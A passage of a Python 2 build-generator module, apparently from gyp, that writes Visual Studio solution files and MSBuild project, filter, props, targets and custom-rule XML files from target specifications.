(target_list, target_dicts) = MSVSUtil.ShardTargets(target_list, target_dicts)
# Optionally use the large PDB workaround for targets marked with
# 'msvs_large_pdb': 1.
(target_list, target_dicts) = MSVSUtil.InsertLargePdbShims(
target_list, target_dicts, generator_default_variables)
# Optionally configure each spec to use ninja as the external builder.
if params.get('flavor') == 'ninja':
_InitNinjaFlavor(options, target_list, target_dicts)
# Prepare the set of configurations.
configs = set()
for qualified_target in target_list:
spec = target_dicts[qualified_target]
for config_name, config in spec['configurations'].iteritems():
configs.add(_ConfigFullName(config_name, config))
configs = list(configs)
# Figure out all the projects that will be generated and their guids
project_objects = _CreateProjectObjects(target_list, target_dicts, options,
msvs_version)
# Generate each project.
missing_sources = []
for project in project_objects.values():
fixpath_prefix = project.fixpath_prefix
missing_sources.extend(_GenerateProject(project, options, msvs_version,
generator_flags))
fixpath_prefix = None
for build_file in data:
# Validate build_file extension
if not build_file.endswith('.gyp'):
continue
sln_path = os.path.splitext(build_file)[0] + options.suffix + '.sln'
if options.generator_output:
sln_path = os.path.join(options.generator_output, sln_path)
# Get projects in the solution, and their dependents.
sln_projects = gyp.common.BuildFileTargets(target_list, build_file)
sln_projects += gyp.common.DeepDependencyTargets(target_dicts, sln_projects)
# Create folder hierarchy.
root_entries = _GatherSolutionFolders(
sln_projects, project_objects, flat=msvs_version.FlatSolution())
# Create solution.
sln = MSVSNew.MSVSSolution(sln_path,
entries=root_entries,
variants=configs,
websiteProperties=False,
version=msvs_version)
sln.Write()
if missing_sources:
error_message = "Missing input files:\n" + \
'\n'.join(set(missing_sources))
if generator_flags.get('msvs_error_on_missing_sources', False):
raise GypError(error_message)
else:
print >> sys.stdout, "Warning: " + error_message
def _GenerateMSBuildFiltersFile(filters_path, source_files,
extension_to_rule_name):
"""Generate the filters file.
This file is used by Visual Studio to organize the presentation of source
files into folders.
Arguments:
filters_path: The path of the file to be created.
source_files: The hierarchical structure of all the sources.
extension_to_rule_name: A dictionary mapping file extensions to rules.
"""
filter_group = []
source_group = []
_AppendFiltersForMSBuild('', source_files, extension_to_rule_name,
filter_group, source_group)
if filter_group:
content = ['Project',
{'ToolsVersion': '4.0',
'xmlns': 'http://schemas.microsoft.com/developer/msbuild/2003'
},
['ItemGroup'] + filter_group,
['ItemGroup'] + source_group
]
easy_xml.WriteXmlIfChanged(content, filters_path, pretty=True, win32=True)
elif os.path.exists(filters_path):
# We don't need this filter anymore. Delete the old filter file.
os.unlink(filters_path)
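# Illustrative sketch for _GenerateMSBuildFiltersFile (added comment, not part
# of the original gyp source): a single source 'src\\foo.cc' nested under a
# Filter named 'src' would produce a .filters file containing roughly
#   <ItemGroup>
#     <Filter Include="src">
#       <UniqueIdentifier>{...guid...}</UniqueIdentifier>
#     </Filter>
#   </ItemGroup>
#   <ItemGroup>
#     <ClCompile Include="src\foo.cc">
#       <Filter>src</Filter>
#     </ClCompile>
#   </ItemGroup>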
def _AppendFiltersForMSBuild(parent_filter_name, sources,
extension_to_rule_name,
filter_group, source_group):
"""Creates the list of filters and sources to be added in the filter file.
Args:
parent_filter_name: The name of the filter under which the sources are
found.
sources: The hierarchy of filters and sources to process.
extension_to_rule_name: A dictionary mapping file extensions to rules.
filter_group: The list to which filter entries will be appended.
    source_group: The list to which source entries will be appended.
"""
for source in sources:
if isinstance(source, MSVSProject.Filter):
# We have a sub-filter. Create the name of that sub-filter.
if not parent_filter_name:
filter_name = source.name
else:
filter_name = '%s\\%s' % (parent_filter_name, source.name)
# Add the filter to the group.
filter_group.append(
['Filter', {'Include': filter_name},
['UniqueIdentifier', MSVSNew.MakeGuid(source.name)]])
# Recurse and add its dependents.
_AppendFiltersForMSBuild(filter_name, source.contents,
extension_to_rule_name,
filter_group, source_group)
else:
# It's a source. Create a source entry.
_, element = _MapFileToMsBuildSourceType(source, extension_to_rule_name)
source_entry = [element, {'Include': source}]
# Specify the filter it is part of, if any.
if parent_filter_name:
source_entry.append(['Filter', parent_filter_name])
source_group.append(source_entry)
def _MapFileToMsBuildSourceType(source, extension_to_rule_name):
"""Returns the group and element type of the source file.
Arguments:
source: The source file name.
extension_to_rule_name: A dictionary mapping file extensions to rules.
Returns:
    A pair of (the group this file should be part of, the label of the element).
"""
_, ext = os.path.splitext(source)
if ext in extension_to_rule_name:
group = 'rule'
element = extension_to_rule_name[ext]
elif ext in ['.cc', '.cpp', '.c', '.cxx']:
group = 'compile'
element = 'ClCompile'
elif ext in ['.h', '.hxx']:
group = 'include'
element = 'ClInclude'
elif ext == '.rc':
group = 'resource'
element = 'ResourceCompile'
elif ext == '.idl':
group = 'midl'
element = 'Midl'
else:
group = 'none'
element = 'None'
return (group, element)
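# Illustrative examples for _MapFileToMsBuildSourceType (added comment, not
# part of the original gyp source), assuming no custom rules are registered:
#   _MapFileToMsBuildSourceType('foo.cpp', {})  -> ('compile', 'ClCompile')
#   _MapFileToMsBuildSourceType('foo.h', {})    -> ('include', 'ClInclude')
#   _MapFileToMsBuildSourceType('app.rc', {})   -> ('resource', 'ResourceCompile')
#   _MapFileToMsBuildSourceType('README', {})   -> ('none', 'None')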
def _GenerateRulesForMSBuild(output_dir, options, spec,
sources, excluded_sources,
props_files_of_rules, targets_files_of_rules,
actions_to_add, extension_to_rule_name):
# MSBuild rules are implemented using three files: an XML file, a .targets
# file and a .props file.
# See http://blogs.msdn.com/b/vcblog/archive/2010/04/21/quick-help-on-vs2010-custom-build-rule.aspx
# for more details.
rules = spec.get('rules', [])
rules_native = [r for r in rules if not int(r.get('msvs_external_rule', 0))]
rules_external = [r for r in rules if int(r.get('msvs_external_rule', 0))]
msbuild_rules = []
for rule in rules_native:
# Skip a rule with no action and no inputs.
if 'action' not in rule and not rule.get('rule_sources', []):
continue
msbuild_rule = MSBuildRule(rule, spec)
msbuild_rules.append(msbuild_rule)
extension_to_rule_name[msbuild_rule.extension] = msbuild_rule.rule_name
if msbuild_rules:
base = spec['target_name'] + options.suffix
props_name = base + '.props'
targets_name = base + '.targets'
xml_name = base + '.xml'
props_files_of_rules.add(props_name)
targets_files_of_rules.add(targets_name)
props_path = os.path.join(output_dir, props_name)
targets_path = os.path.join(output_dir, targets_name)
xml_path = os.path.join(output_dir, xml_name)
_GenerateMSBuildRulePropsFile(props_path, msbuild_rules)
_GenerateMSBuildRuleTargetsFile(targets_path, msbuild_rules)
_GenerateMSBuildRuleXmlFile(xml_path, msbuild_rules)
if rules_external:
_GenerateExternalRules(rules_external, output_dir, spec,
sources, options, actions_to_add)
_AdjustSourcesForRules(spec, rules, sources, excluded_sources)
class MSBuildRule(object):
"""Used to store information used to generate an MSBuild rule.
Attributes:
rule_name: The rule name, sanitized to use in XML.
target_name: The name of the target.
after_targets: The name of the AfterTargets element.
before_targets: The name of the BeforeTargets element.
depends_on: The name of the DependsOn element.
compute_output: The name of the ComputeOutput element.
dirs_to_make: The name of the DirsToMake element.
inputs: The name of the _inputs element.
tlog: The name of the _tlog element.
extension: The extension this rule applies to.
description: The message displayed when this rule is invoked.
additional_dependencies: A string listing additional dependencies.
outputs: The outputs of this rule.
command: The command used to run the rule.
"""
def __init__(self, rule, spec):
self.display_name = rule['rule_name']
    # Make sure the rule name contains only word characters (letters, digits
    # and underscores).
self.rule_name = re.sub(r'\W', '_', self.display_name)
# Create the various element names, following the example set by the
# Visual Studio 2008 to 2010 conversion. I don't know if VS2010
# is sensitive to the exact names.
self.target_name = '_' + self.rule_name
self.after_targets = self.rule_name + 'AfterTargets'
self.before_targets = self.rule_name + 'BeforeTargets'
self.depends_on = self.rule_name + 'DependsOn'
self.compute_output = 'Compute%sOutput' % self.rule_name
self.dirs_to_make = self.rule_name + 'DirsToMake'
self.inputs = self.rule_name + '_inputs'
self.tlog = self.rule_name + '_tlog'
self.extension = rule['extension']
if not self.extension.startswith('.'):
self.extension = '.' + self.extension
self.description = MSVSSettings.ConvertVCMacrosToMSBuild(
rule.get('message', self.rule_name))
old_additional_dependencies = _FixPaths(rule.get('inputs', []))
self.additional_dependencies = (
';'.join([MSVSSettings.ConvertVCMacrosToMSBuild(i)
for i in old_additional_dependencies]))
old_outputs = _FixPaths(rule.get('outputs', []))
self.outputs = ';'.join([MSVSSettings.ConvertVCMacrosToMSBuild(i)
for i in old_outputs])
old_command = _BuildCommandLineForRule(spec, rule, has_input_path=True,
do_setup_env=True)
self.command = MSVSSettings.ConvertVCMacrosToMSBuild(old_command)
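# Illustrative sketch for MSBuildRule (added comment, not part of the original
# gyp source): a hypothetical gyp rule named 'idl_compile' with extension
# 'idl' yields the derived element names
#   rule_name      -> 'idl_compile'
#   target_name    -> '_idl_compile'
#   before_targets -> 'idl_compileBeforeTargets'
#   after_targets  -> 'idl_compileAfterTargets'
#   depends_on     -> 'idl_compileDependsOn'
#   compute_output -> 'Computeidl_compileOutput'
#   extension      -> '.idl'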
def _GenerateMSBuildRulePropsFile(props_path, msbuild_rules):
"""Generate the .props file."""
content = ['Project',
{'xmlns': 'http://schemas.microsoft.com/developer/msbuild/2003'}]
for rule in msbuild_rules:
content.extend([
['PropertyGroup',
{'Condition': "'$(%s)' == '' and '$(%s)' == '' and "
"'$(ConfigurationType)' != 'Makefile'" % (rule.before_targets,
rule.after_targets)
},
[rule.before_targets, 'Midl'],
[rule.after_targets, 'CustomBuild'],
],
['PropertyGroup',
[rule.depends_on,
{'Condition': "'$(ConfigurationType)' != 'Makefile'"},
'_SelectedFiles;$(%s)' % rule.depends_on
],
],
['ItemDefinitionGroup',
[rule.rule_name,
['CommandLineTemplate', rule.command],
['Outputs', rule.outputs],
['ExecutionDescription', rule.description],
['AdditionalDependencies', rule.additional_dependencies],
],
]
])
easy_xml.WriteXmlIfChanged(content, props_path, pretty=True, win32=True)
def _GenerateMSBuildRuleTargetsFile(targets_path, msbuild_rules):
"""Generate the .targets file."""
content = ['Project',
{'xmlns': 'http://schemas.microsoft.com/developer/msbuild/2003'
}
]
item_group = [
'ItemGroup',
['PropertyPageSchema',
{'Include': '$(MSBuildThisFileDirectory)$(MSBuildThisFileName).xml'}
]
]
for rule in msbuild_rules:
item_group.append(
['AvailableItemName',
{'Include': rule.rule_name},
['Targets', rule.target_name],
])
content.append(item_group)
for rule in msbuild_rules:
content.append(
['UsingTask',
{'TaskName': rule.rule_name,
'TaskFactory': 'XamlTaskFactory',
'AssemblyName': 'Microsoft.Build.Tasks.v4.0'
},
['Task', '$(MSBuildThisFileDirectory)$(MSBuildThisFileName).xml'],
])
for rule in msbuild_rules:
rule_name = rule.rule_name
target_outputs = '%%(%s.Outputs)' % rule_name
target_inputs = ('%%(%s.Identity);%%(%s.AdditionalDependencies);'
'$(MSBuildProjectFile)') % (rule_name, rule_name)
rule_inputs = '%%(%s.Identity)' % rule_name
extension_condition = ("'%(Extension)'=='.obj' or "
"'%(Extension)'=='.res' or "
"'%(Extension)'=='.rsc' or "
"'%(Extension)'=='.lib'")
remove_section = [
'ItemGroup',
{'Condition': "'@(SelectedFiles)' != ''"},
[rule_name,
{'Remove': '@(%s)' % rule_name,
'Condition': "'%(Identity)' != '@(SelectedFiles)'"
}
]
]
inputs_section = [
'ItemGroup',
[rule.inputs, {'Include': '%%(%s.AdditionalDependencies)' % rule_name}]
]
logging_section = [
'ItemGroup',
[rule.tlog,
{'Include': '%%(%s.Outputs)' % rule_name,
'Condition': ("'%%(%s.Outputs)' != '' and "
"'%%(%s.ExcludedFromBuild)' != 'true'" %
(rule_name, rule_name))
},
['Source', "@(%s, '|')" % rule_name],
['Inputs', "@(%s -> '%%(Fullpath)', ';')" % rule.inputs],
],
]
message_section = [
'Message',
{'Importance': 'High',
'Text': '%%(%s.ExecutionDescription)' % rule_name
}
]
write_tlog_section = [
'WriteLinesToFile',
{'Condition': "'@(%s)' != '' and '%%(%s.ExcludedFromBuild)' != "
"'true'" % (rule.tlog, rule.tlog),
'File': '$(IntDir)$(ProjectName).write.1.tlog',
'Lines': "^%%(%s.Source);@(%s->'%%(Fullpath)')" % (rule.tlog,
rule.tlog)
}
]
read_tlog_section = [
'WriteLinesToFile',
{'Condition': "'@(%s)' != '' and '%%(%s.ExcludedFromBuild)' != "
"'true'" % (rule.tlog, rule.tlog),
'File': '$(IntDir)$(ProjectName).read.1.tlog',
'Lines': "^%%(%s.Source);%%(%s.Inputs)" % (rule.tlog, rule.tlog)
}
]
command_and_input_section = [
rule_name,
{'Condition': "'@(%s)' != '' and '%%(%s.ExcludedFromBuild)' != "
"'true'" % (rule_name, rule_name),
'CommandLineTemplate': '%%(%s.CommandLineTemplate)' % rule_name,
'AdditionalOptions': '%%(%s.AdditionalOptions)' % rule_name,
'Inputs': rule_inputs
}
]
content.extend([
['Target',
{'Name': rule.target_name,
'BeforeTargets': '$(%s)' % rule.before_targets,
'AfterTargets': '$(%s)' % rule.after_targets,
'Condition': "'@(%s)' != ''" % rule_name,
'DependsOnTargets': '$(%s);%s' % (rule.depends_on,
rule.compute_output),
'Outputs': target_outputs,
'Inputs': target_inputs
},
remove_section,
inputs_section,
logging_section,
message_section,
write_tlog_section,
read_tlog_section,
command_and_input_section,
],
['PropertyGroup',
['ComputeLinkInputsTargets',
'$(ComputeLinkInputsTargets);',
'%s;' % rule.compute_output
],
['ComputeLibInputsTargets',
'$(ComputeLibInputsTargets);',
'%s;' % rule.compute_output
],
],
['Target',
{'Name': rule.compute_output,
'Condition': "'@(%s)' != ''" % rule_name
},
['ItemGroup',
[rule.dirs_to_make,
{'Condition': "'@(%s)' != '' and "
"'%%(%s.ExcludedFromBuild)' != 'true'" % (rule_name, rule_name),
'Include': '%%(%s.Outputs)' % rule_name
}
],
['Link',
{'Include': '%%(%s.Identity)' % rule.dirs_to_make,
'Condition': extension_condition
}
],
['Lib',
{'Include': '%%(%s.Identity)' % rule.dirs_to_make,
'Condition': extension_condition
}
],
['ImpLib',
{'Include': '%%(%s.Identity)' % rule.dirs_to_make,
'Condition': extension_condition
}
],
],
['MakeDir',
{'Directories': ("@(%s->'%%(RootDir)%%(Directory)')" %
rule.dirs_to_make)
}
]
],
])
easy_xml.WriteXmlIfChanged(content, targets_path, pretty=True, win32=True)
def _GenerateMSBuildRuleXmlFile(xml_path, msbuild_rules):
# Generate the .xml file
content = [
'ProjectSchemaDefinitions',
{'xmlns': ('clr-namespace:Microsoft.Build.Framework.XamlTypes;'
'assembly=Microsoft.Build.Framework'),
'xmlns:x': 'http://schemas.microsoft.com/winfx/2006/xaml',
'xmlns:sys': 'clr-namespace:System;assembly=mscorlib',
'xmlns:transformCallback':
'Microsoft.Cpp.Dev10.ConvertPropertyCallback'
}
]
for rule in msbuild_rules:
content.extend([
['Rule',
{'Name': rule.rule_name,
'PageTemplate': 'tool',
'DisplayName': rule.display_name,
'Order': '200'
},
['Rule.DataSource',
['DataSource',
{'Persistence': 'ProjectFile',
'ItemType': rule.rule_name
}
]
],
['Rule.Categories',
['Category',
{'Name': 'General'},
['Category.DisplayName',
['sys:String', 'General'],
],
],
['Category',
{'Name': 'Command Line',
'Subtype': 'CommandLine'
},
['Category.DisplayName',
['sys:String', 'Command Line'],
],
],
],
['StringListProperty',
{'Name': 'Inputs',
'Category': 'Command Line',
'IsRequired': 'true',
'Switch': ' '
},
['StringListProperty.DataSource',
['DataSource',
{'Persistence': 'ProjectFile',
'ItemType': rule.rule_name,
'SourceType': 'Item'
}
]
],
],
['StringProperty',
{'Name': 'CommandLineTemplate',
'DisplayName': 'Command Line',
'Visible': 'False',
'IncludeInCommandLine': 'False'
}
],
['DynamicEnumProperty',
{'Name': rule.before_targets,
'Category': 'General',
'EnumProvider': 'Targets',
'IncludeInCommandLine': 'False'
},
['DynamicEnumProperty.DisplayName',
['sys:String', 'Execute Before'],
],
['DynamicEnumProperty.Description',
['sys:String', 'Specifies the targets for the build customization'
' to run before.'
],
],
['DynamicEnumProperty.ProviderSettings',
['NameValuePair',
{'Name': 'Exclude',
'Value': '^%s|^Compute' % rule.before_targets
}
]
],
['DynamicEnumProperty.DataSource',
['DataSource',
{'Persistence': 'ProjectFile',
'HasConfigurationCondition': 'true'
}
]
],
],
['DynamicEnumProperty',
{'Name': rule.after_targets,
'Category': 'General',
'EnumProvider': 'Targets',
'IncludeInCommandLine': 'False'
},
['DynamicEnumProperty.DisplayName',
['sys:String', 'Execute After'],
],
['DynamicEnumProperty.Description',
['sys:String', ('Specifies the targets for the build customization'
' to run after.')
],
],
['DynamicEnumProperty.ProviderSettings',
['NameValuePair',
{'Name': 'Exclude',
'Value': '^%s|^Compute' % rule.after_targets
}
]
],
['DynamicEnumProperty.DataSource',
['DataSource',
{'Persistence': 'ProjectFile',
'ItemType': '',
'HasConfigurationCondition': 'true'
}
]
],
],
['StringListProperty',
{'Name': 'Outputs',
'DisplayName': 'Outputs',
'Visible': 'False',
'IncludeInCommandLine': 'False'
}
],
['StringProperty',
{'Name': 'ExecutionDescription',
'DisplayName': 'Execution Description',
'Visible': 'False',
'IncludeInCommandLine': 'False'
}
],
['StringListProperty',
{'Name': 'AdditionalDependencies',
'DisplayName': 'Additional Dependencies',
'IncludeInCommandLine': 'False',
'Visible': 'false'
}
],
['StringProperty',
{'Subtype': 'AdditionalOptions',
'Name': 'AdditionalOptions',
'Category': 'Command Line'
},
['StringProperty.DisplayName',
['sys:String', 'Additional Options'],
],
['StringProperty.Description',
['sys:String', 'Additional Options'],
],
],
],
['ItemType',
{'Name': rule.rule_name,
'DisplayName': rule.display_name
}
],
['FileExtension',
{'Name': '*' + rule.extension,
'ContentType': rule.rule_name
}
],
['ContentType',
{'Name': rule.rule_name,
'DisplayName': '',
'ItemType': rule.rule_name
}
]
])
easy_xml.WriteXmlIfChanged(content, xml_path, pretty=True, win32=True)
def _GetConfigurationAndPlatform(name, settings):
configuration = name.rsplit('_', 1)[0]
platform = settings.get('msvs_configuration_platform', 'Win32')
return (configuration, platform)
def _GetConfigurationCondition(name, settings):
return (r"'$(Configuration)|$(Platform)'=='%s|%s'" %
_GetConfigurationAndPlatform(name, settings))
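# Illustrative example for _GetConfigurationCondition (added comment, not part
# of the original gyp source): a configuration named 'Debug_x64' whose
# settings contain 'msvs_configuration_platform': 'x64' produces
#   "'$(Configuration)|$(Platform)'=='Debug|x64'"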
def _GetMSBuildProjectConfigurations(configurations):
group = ['ItemGroup', {'Label': 'ProjectConfigurations'}]
for (name, settings) in sorted(configurations.iteritems()):
configuration, platform = _GetConfigurationAndPlatform(name, settings)
designation = '%s|%s' % (configuration, platform)
group.append(
['ProjectConfiguration', {'Include': designation},
['Configuration', configuration],
['Platform', platform]])
return [group]
def _GetMSBuildGlobalProperties(spec, guid, gyp_file_name):
namespace = os.path.splitext(gyp_file_name)[0]
return [
['PropertyGroup', {'Label': 'Globals'},
['ProjectGuid', guid],
['Keyword', 'Win32Proj'],
['RootNamespace', namespace],
]
]
def _GetMSBuildConfigurationDetails(spec, build_file):
properties = {}
for name, settings in spec['configurations'].iteritems():
msbuild_attributes = _GetMSBuildAttributes(spec, settings, build_file)
condition = _GetConfigurationCondition(name, settings)
character_set = msbuild_attributes.get('CharacterSet')
_AddConditionalProperty(properties, condition, 'ConfigurationType',
msbuild_attributes['ConfigurationType'])
if character_set:
_AddConditionalProperty(properties, condition, 'CharacterSet',
character_set)
return _GetMSBuildPropertyGroup(spec, 'Configuration', properties)
def _GetMSBuildLocalProperties(msbuild_toolset):
# Currently the only local property we support is PlatformToolset
properties = {}
if msbuild_toolset:
properties = [
['PropertyGroup', {'Label': 'Locals'},
['PlatformToolset', msbuild_toolset],
]
]
return properties
def _GetMSBuildPropertySheets(configurations):
user_props = r'$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props'
additional_props = {}
props_specified = False
for name, settings in sorted(configurations.iteritems()):
configuration = _GetConfigurationCondition(name, settings)
    if 'msbuild_props' in settings:
additional_props[configuration] = _FixPaths(settings['msbuild_props'])
props_specified = True
else:
additional_props[configuration] = ''
if not props_specified:
return [
['ImportGroup',
{'Label': 'PropertySheets'},
['Import',
{'Project': user_props,
'Condition': "exists('%s')" % user_props,
'Label': 'LocalAppDataPlatform'
}
]
]
]
else:
sheets = []
for condition, props in additional_props.iteritems():
import_group = [
'ImportGroup',
{'Label': 'PropertySheets',
'Condition': condition
},
['Import',
{'Project': user_props,
'Condition': "exists('%s')" % user_props,
'Label': 'LocalAppDataPlatform'
}
]
]
for props_file in props:
import_group.append(['Import', {'Project':props_file}])
sheets.append(import_group)
return sheets
def _ConvertMSVSBuildAttributes(spec, config, build_file):
config_type = _GetMSVSConfigurationType(spec, build_file)
msvs_attributes = _GetMSVSAttributes(spec, config, config_type)
msbuild_attributes = {}
for a in msvs_attributes:
if a in ['IntermediateDirectory', 'OutputDirectory']:
directory = MSVSSettings.ConvertVCMacrosToMSBuild(msvs_attributes[a])
if not directory.endswith('\\'):
directory += '\\'
msbuild_attributes[a] = directory
elif a == 'CharacterSet':
msbuild_attributes[a] = _ConvertMSVSCharacterSet(msvs_attributes[a])
elif a == 'ConfigurationType':
msbuild_attributes[a] = _ConvertMSVSConfigurationType(msvs_attributes[a])
else:
print 'Warning: Do not know how to convert MSVS attribute ' + a
return msbuild_attributes
def _ConvertMSVSCharacterSet(char_set):
if char_set.isdigit():
char_set = {
'0': 'MultiByte',
'1': 'Unicode',
'2': 'MultiByte',
}[char_set]
return char_set
def _ConvertMSVSConfigurationType(config_type):
if config_type.isdigit():
config_type = {
'1': 'Application',
'2': 'DynamicLibrary',
'4': 'StaticLibrary',
'10': 'Utility'
}[config_type]
return config_type
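# Illustrative mapping examples (added comment, not part of the original gyp
# source):
#   _ConvertMSVSCharacterSet('1')        -> 'Unicode'
#   _ConvertMSVSCharacterSet('Unicode')  -> 'Unicode'   (non-digits pass through)
#   _ConvertMSVSConfigurationType('2')   -> 'DynamicLibrary'
#   _ConvertMSVSConfigurationType('10')  -> 'Utility'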
def _GetMSBuildAttributes(spec, config, build_file):
if 'msbuild_configuration_attributes' not in config:
msbuild_attributes = _ConvertMSVSBuildAttributes(spec, config, build_file)
else:
config_type = _GetMSVSConfigurationType(spec, build_file)
config_type = _ConvertMSVSConfigurationType(config_type)
msbuild_attributes = config.get('msbuild_configuration_attributes', {})
msbuild_attributes.setdefault('ConfigurationType', config_type)
output_dir = msbuild_attributes.get('OutputDirectory',
'$(SolutionDir)$(Configuration)')
msbuild_attributes['OutputDirectory'] = _FixPath(output_dir) + '\\'
if 'IntermediateDirectory' not in msbuild_attributes:
intermediate = _FixPath('$(Configuration)') + '\\'
msbuild_attributes['IntermediateDirectory'] = intermediate
if 'CharacterSet' in msbuild_attributes:
msbuild_attributes['CharacterSet'] = _ConvertMSVSCharacterSet(
msbuild_attributes['CharacterSet'])
if 'TargetName' not in msbuild_attributes:
prefix = spec.get('product_prefix', '')
product_name = spec.get('product_name', '$(ProjectName)')
target_name = prefix + product_name
msbuild_attributes['TargetName'] = target_name
if spec.get('msvs_external_builder'):
external_out_dir = spec.get('msvs_external_builder_out_dir', '.')
msbuild_attributes['OutputDirectory'] = _FixPath(external_out_dir) + '\\'
# Make sure that 'TargetPath' matches 'Lib.OutputFile' or 'Link.OutputFile'
# (depending on the tool used) to avoid MSB8012 warning.
msbuild_tool_map = {
'executable': 'Link',
'shared_library': 'Link',
'loadable_module': 'Link',
'static_library': 'Lib',
}
msbuild_tool = msbuild_tool_map.get(spec['type'])
if msbuild_tool:
msbuild_settings = config['finalized_msbuild_settings']
out_file = msbuild_settings[msbuild_tool].get('OutputFile')
if out_file:
msbuild_attributes['TargetPath'] = _FixPath(out_file)
target_ext = msbuild_settings[msbuild_tool].get('TargetExt')
if target_ext:
msbuild_attributes['TargetExt'] = target_ext
return msbuild_attributes
def _GetMSBuildConfigurationGlobalProperties(spec, configurations, build_file):
# TODO(jeanluc) We could optimize out the following and do it only if
# there are actions.
# TODO(jeanluc) Handle the equivalent of setting 'CYGWIN=nontsec'.
new_paths = []
cygwin_dirs = spec.get('msvs_cygwin_dirs', ['.'])[0]
if cygwin_dirs:
cyg_path = '$(MSBuildProjectDirectory)\\%s\\bin\\' % _FixPath(cygwin_dirs)
new_paths.append(cyg_path)
# TODO(jeanluc) Change the convention to have both a cygwin_dir and a
# python_dir.
python_path = cyg_path.replace('cygwin\\bin', 'python_26')
new_paths.append(python_path)
if new_paths:
new_paths = '$(ExecutablePath);' + ';'.join(new_paths)
properties = {}
for (name, configuration) in sorted(configurations.iteritems()):
condition = _GetConfigurationCondition(name, configuration)
attributes = _GetMSBuildAttributes(spec, configuration, build_file)
msbuild_settings = configuration['finalized_msbuild_settings']
_AddConditionalProperty(properties, condition, 'IntDir',
attributes['IntermediateDirectory'])
_AddConditionalProperty(properties, condition, 'OutDir',
attributes['OutputDirectory'])
_AddConditionalProperty(properties, condition, 'TargetName',
attributes['TargetName'])
if attributes.get('TargetPath'):
_AddConditionalProperty(properties, condition, 'TargetPath',
attributes['TargetPath'])
if attributes.get('TargetExt'):
_AddConditionalProperty(properties, condition, 'TargetExt',
attributes['TargetExt'])
if new_paths:
_AddConditionalProperty(properties, condition, 'ExecutablePath',
new_paths)
tool_settings = msbuild_settings.get('', {})
for name, value in sorted(tool_settings.iteritems()):
formatted_value = _GetValueFormattedForMSBuild('', name, value)
_AddConditionalProperty(properties, condition, name, formatted_value)
return _GetMSBuildPropertyGroup(spec, None, properties)
def _AddConditionalProperty(properties, condition, name, value):
"""Adds a property / conditional value pair to a dictionary.
Arguments:
properties: The dictionary to be modified. The key is the name of the
property. The value is itself a dictionary; its key is the value and
the value a list of condition for which this value is true.
condition: The condition under which the named property has the value.
name: The name of the property.
value: The value of the property.
"""
if name not in properties:
properties[name] = {}
values = properties[name]
if value not in values:
values[value] = []
conditions = values[value]
conditions.append(condition)
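# Illustrative sketch for _AddConditionalProperty (added comment, not part of
# the original gyp source): two calls such as
#   _AddConditionalProperty(props, debug_cond, 'OutDir', 'Debug\\')
#   _AddConditionalProperty(props, release_cond, 'OutDir', 'Release\\')
# leave props looking like
#   {'OutDir': {'Debug\\': [debug_cond], 'Release\\': [release_cond]}}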
# Regex for msvs variable references (i.e. $(FOO)).
MSVS_VARIABLE_REFERENCE = re.compile(r'\$\(([a-zA-Z_][a-zA-Z0-9_]*)\)')
def _GetMSBuildPropertyGroup(spec, label, properties):
"""Returns a PropertyGroup definition for the specified properties.
Arguments:
spec: The target project dict.
label: An optional label for the PropertyGroup.
properties: The dictionary to be converted. The key is the name of the
property. The value is itself a dictionary; its key is the value and
the value a list of condition for which this value is true.
"""
group = ['PropertyGroup']
if label:
group.append({'Label': label})
num_configurations = len(spec['configurations'])
def GetEdges(node):
    # Use a definition of edges such that user_of_variable -> used_variable.
# This happens to be easier in this case, since a variable's
# definition contains all variables it references in a single string.
edges = set()
for value in sorted(properties[node].keys()):
# Add to edges all $(...) references to variables.
#
      # Variable references that refer to names not in properties are excluded.
      # These can exist, for instance, to refer to built-in definitions like
      # $(SolutionDir).
#
# Self references are ignored. Self reference is used in a few places to
# append to the default value. I.e. PATH=$(PATH);other_path
edges.update(set([v for v in MSVS_VARIABLE_REFERENCE.findall(value)
if v in properties and v != node]))
return edges
properties_ordered = gyp.common.TopologicallySorted(
properties.keys(), GetEdges)
# Walk properties in the reverse of a topological sort on
# user_of_variable -> used_variable as this ensures variables are
# defined before they are used.
# NOTE: reverse(topsort(DAG)) = topsort(reverse_edges(DAG))
for name in reversed(properties_ordered):
values = properties[name]
for value, conditions in sorted(values.iteritems()):
if len(conditions) == num_configurations:
        # If the value is the same for all configurations,
        # just add one unconditional entry.
group.append([name, value])
else:
for condition in conditions:
group.append([name, {'Condition': condition}, value])
return [group]
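# Illustrative output shape for _GetMSBuildPropertyGroup (added comment, not
# part of the original gyp source): with two configurations that share the
# same 'TargetName' but differ in 'OutDir', the returned specification is
# roughly
#   [['PropertyGroup',
#     ['TargetName', 'foo'],
#     ['OutDir', {'Condition': "...=='Debug|Win32'"}, 'Debug\\'],
#     ['OutDir', {'Condition': "...=='Release|Win32'"}, 'Release\\']]]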
def _GetMSBuildToolSettingsSections(spec, configurations):
groups = []
for (name, configuration) in sorted(configurations.iteritems()):
msbuild_settings = configuration['finalized_msbuild_settings']
group = ['ItemDefinitionGroup',
{'Condition': _GetConfigurationCondition(name, configuration)}
]
for tool_name, tool_settings in sorted(msbuild_settings.iteritems()):
# Skip the tool named '' which is a holder of global settings handled
# by _GetMSBuildConfigurationGlobalProperties.
if tool_name:
if tool_settings:
tool = [tool_name]
for name, value in sorted(tool_settings.iteritems()):
formatted_value = _GetValueFormattedForMSBuild(tool_name, name,
value)
tool.append([name, formatted_value])
group.append(tool)
groups.append(group)
return groups
def _FinalizeMSBuildSettings(spec, configuration):
if 'msbuild_settings' in configuration:
converted = False
msbuild_settings = configuration['msbuild_settings']
MSVSSettings.ValidateMSBuildSettings(msbuild_settings)
else:
converted = True
msvs_settings = configuration.get('msvs_settings', {})
msbuild_settings = MSVSSettings.ConvertToMSBuildSettings(msvs_settings)
include_dirs, resource_include_dirs = _GetIncludeDirs(configuration)
libraries = _GetLibraries(spec)
library_dirs = _GetLibraryDirs(configuration)
out_file, _, msbuild_tool = _GetOutputFilePathAndTool(spec, msbuild=True)
target_ext = _GetOutputTargetExt(spec)
defines = _GetDefines(configuration)
if converted:
# Visual Studio 2010 has TR1
defines = [d for d in defines if d != '_HAS_TR1=0']
# Warn of ignored settings
ignored_settings = ['msvs_prebuild', 'msvs_postbuild', 'msvs_tool_files']
for ignored_setting in ignored_settings:
value = configuration.get(ignored_setting)
if value:
print ('Warning: The automatic conversion to MSBuild does not handle '
'%s. Ignoring setting of %s' % (ignored_setting, str(value)))
defines = [_EscapeCppDefineForMSBuild(d) for d in defines]
disabled_warnings = _GetDisabledWarnings(configuration)
# TODO(jeanluc) Validate & warn that we don't translate
# prebuild = configuration.get('msvs_prebuild')
